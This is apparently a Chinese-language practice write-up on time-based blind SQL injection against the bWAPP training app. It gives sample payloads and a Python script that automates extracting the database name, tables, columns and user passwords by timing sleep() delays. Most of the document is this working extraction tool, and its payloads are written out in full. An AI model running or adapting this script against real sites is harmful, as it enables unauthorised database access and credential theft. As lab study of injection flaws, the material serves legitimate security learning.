• 测试平台:bwapp
    • SQL Injection - Blind - Time-Based
  • 常用函数
    • substr(a,b,c):从b位置开始,截取字符串a的c长度
    • count():计算总数
    • ascii():返回字符的ASCII
    • length():返回字符串的长度
    • left(a,b):从左往右截取字符串a的前b个字符
    • sleep(n):将程序挂起n秒
  • 用 and 连接,sleep 放在最后,才能确认前面的语句全为真
  • 数据库名字长度获取
    • World War Z' and length(database())=4 and sleep(3) #
  • 数据库的名字
    • World War Z' and ascii(substr(database(),1,1))==98 and sleep(3) #
  • 写了个自动化脚本,没做优化
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    168
    169
    170
    171
    172
    173
    174
    175
    176
    177
    178
    179
    180
    181
    182
    183
    184
    185
    186
    187
    188
    189
    190
    191
    192
    193
    194
    195
    196

    #coding:utf-8
    import requests
    import time

    class SQL_TIME_BIND:
        def __init__(self,urlLogin,data,ip_port):
            self.ip_port = ip_port
            self.session=requests.session()
            self.resp=self.session.post(urlLogin,data)
            
        def get_db_name(self):
            """
            获取数据库名
            """
            db_len = 0
            for i in range(1,21):
                url="http://%s/sqli_15.php?title=World War Z' and length(database())=%d and sleep(3) -- &action=search"%(self.ip_port,i) 
                startTime=time.time()
                rsp=self.session.get(url)
                endTime=time.time()
                ga=endTime-startTime
                if ga>1:
                    print("length of database name is %d"%i)
                    db_len=i
                    break
            db_name = []
            for j in range(1,db_len+1):
                for k in range(48,123): # ascii 从 0 到 z
                    url="http://%s/sqli_15.php?title=World War Z' and ascii(substr(database(),%d,1))=%d   and sleep(3) -- &action=search"%(self.ip_port,j,k)
                    startTime=time.time()
                    rsp=self.session.get(url)
                    endTime=time.time()
                    ga=endTime-startTime
                    if ga>1:
                        db_name.append(chr(k))
                        break
            print("".join(db_name))
        
        def get_table_name(self):
            """
            获取表名
            """
            # db_name = self.get_db_name()
            count_table = 0
            for i in range(1,20): # 测试表的数量
                # url="http://%s/sqli_15.php?title=World War Z' and if((select count(table_name) from information_schema.tables where table_schema=\'%s\')<%d,sleep(3),1) --  &action=search"%(self.ip_port,db_name,i)
                # print(url)
                url="http://%s/sqli_15.php?title=World War Z' and if((select count(table_name) from information_schema.tables where table_schema=database())<%d,sleep(3),1) --  &action=search"%(self.ip_port,i)
                startTime=time.time()
                rsp=self.session.get(url)
                endTime=time.time()
                ga=endTime-startTime
                if ga>1:
                    count_table = i-1
                    break
            # return count_table
            # World War Z' and if(length((select table_name from information_schema.tables where table_schema = database() limit 0,1))<4,sleep(3),1) -- 
            for i in range(count_table):
                len_table = 0
                for l in range(1,20):
                    url="http://%s/sqli_15.php?title=World War Z' and if(length((select table_name from information_schema.tables where table_schema = database() limit %d,1))<%d,sleep(3),1) --  &action=search"%(self.ip_port,i,l)
                    # print(url)
                    startTime=time.time()
                    rsp=self.session.get(url)
                    endTime=time.time()
                    ga=endTime-startTime
                    if ga>1:
                        len_table = l-1
                        break
                # print(len_table)
                # World War Z' and if(ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1)) = 98,sleep(3),1) -- 
                table_name = []
                for m in range(l):
                    for n in range(48,123): # ascii 从 0 到 z
                        url="http://%s/sqli_15.php?title=World War Z' and if(ascii(substr((select table_name from information_schema.tables where table_schema = database() limit %d,1),%d,1)) = %d,sleep(3),1) -- &action=search"%(self.ip_port,i,m,n)
                        # print(url)
                        startTime=time.time()
                        rsp=self.session.get(url)
                        endTime=time.time()
                        ga=endTime-startTime
                        if ga>1:
                            table_name.append(chr(n))
                            break
                print("".join(table_name))
        
        def get_columns_name(self,table_name):
            """
            获取列名
            param:
                table_name: 表名
            ret:
                None
            """
            count_col = 0
            for i in range(1,20): # 测试字段的数量
                # World War Z' and if((select count(column_name) from information_schema.columns where table_name='users')<10,sleep(3),1) -- 
                url="http://%s/sqli_15.php?title=World War Z' and if((select count(column_name) from information_schema.columns where table_name=\'%s\')<%d,sleep(3),1) --  &action=search"%(self.ip_port,table_name,i)
                startTime=time.time()
                rsp=self.session.get(url)
                endTime=time.time()
                ga=endTime-startTime
                if ga>1:
                    count_col = i-1
                    break
            # return count_table
            # World War Z' and if(length((select column_name from information_schema.columns where table_name = 'users' limit 0,1))<10,sleep(3),1) -- 
            for i in range(count_col):
                len_col = 0
                for l in range(1,20):
                    url="http://%s/sqli_15.php?title=World War Z' and if(length((select column_name from information_schema.columns where table_name = \'%s\' limit %d,1))<%d,sleep(3),1) --  &action=search"%(self.ip_port,table_name,i,l)
                    # print(url)
                    startTime=time.time()
                    rsp=self.session.get(url)
                    endTime=time.time()
                    ga=endTime-startTime
                    if ga>1:
                        len_col = l-1
                        break
                # World War Z' and if(ascii(substr((select column_name from information_schema.columns where table_name = \'%s\' limit %d,1),%d,1)) = %d,sleep(3),1) -- 
                col_name = []
                for m in range(l):
                    for n in range(48,123): # ascii 从 0 到 z
                        url="http://%s/sqli_15.php?title=World War Z' and if(ascii(substr((select column_name from information_schema.columns where table_name = \'%s\' limit %d,1),%d,1)) = %d,sleep(3),1) -- &action=search"%(self.ip_port,table_name,i,m,n)
                        startTime=time.time()
                        rsp=self.session.get(url)
                        endTime=time.time()
                        ga=endTime-startTime
                        if ga>1:
                            col_name.append(chr(n))
                            break
                print("".join(col_name))
                
        def get_data(self,table_name,col_name):
            """
            获取表中的值
            param:
                table_name: 表名
                col_name: 列名
            ret:
                None
            """
            count_data = 0
            for i in range(1,266): # 测试值的数量
                # World War Z' and if((select count(*) from users)<10,sleep(3),1) -- 
                url="http://%s/sqli_15.php?title=World War Z' and if((select count(*) from %s)<%d,sleep(3),1) --  &action=search"%(self.ip_port,table_name,i)
                startTime=time.time()
                rsp=self.session.get(url)
                endTime=time.time()
                ga=endTime-startTime
                if ga>1:
                    count_col = i-1
                    break
            # World War Z' and if(length((select id from users limit 0,1))<10,sleep(3),1) -- 
            for i in range(count_col):
                len_data = 0
                for l in range(1,266):
                    url="http://%s/sqli_15.php?title=World War Z' and if(length((select %s from %s limit %d,1))<%d,sleep(3),1) --  &action=search"%(self.ip_port,col_name,table_name,i,l)
                    # print(url)
                    startTime=time.time()
                    rsp=self.session.get(url)
                    endTime=time.time()
                    ga=endTime-startTime
                    if ga>1:
                        len_data = l-1
                        break
                # World War Z' and if(ascii(substr((select %s from %s limit %d,1),%d,1)) = %d,sleep(3),1) -- 
                t_data = []
                for m in range(l):
                    for n in range(48,123): # ascii 从 0 到 z
                        url="http://%s/sqli_15.php?title=World War Z' and if(ascii(substr((select %s from %s limit %d,1),%d,1)) = %d,sleep(3),1) --  &action=search"%(self.ip_port,col_name,table_name,i,m,n)
                        startTime=time.time()
                        rsp=self.session.get(url)
                        endTime=time.time()
                        ga=endTime-startTime
                        if ga>1:
                            t_data.append(chr(n))
                            break
                print("".join(t_data))
    def main():
        ip_port="192.168.2.33:80"
        data={
            "login":"bee",
            "password":"bug",
            "security_level":"0",
            "form":"submit"
        }
        urlLogin="http://%s/login.php"%ip_port
        sql_time = SQL_TIME_BIND(urlLogin,data,ip_port)
        # sql_time.get_db_name()
        # sql_time.get_columns_name('users')
        # sql_time.get_data("users","login")
        sql_time.get_data("users","password")
        
    if __name__ == "__main__":
        main()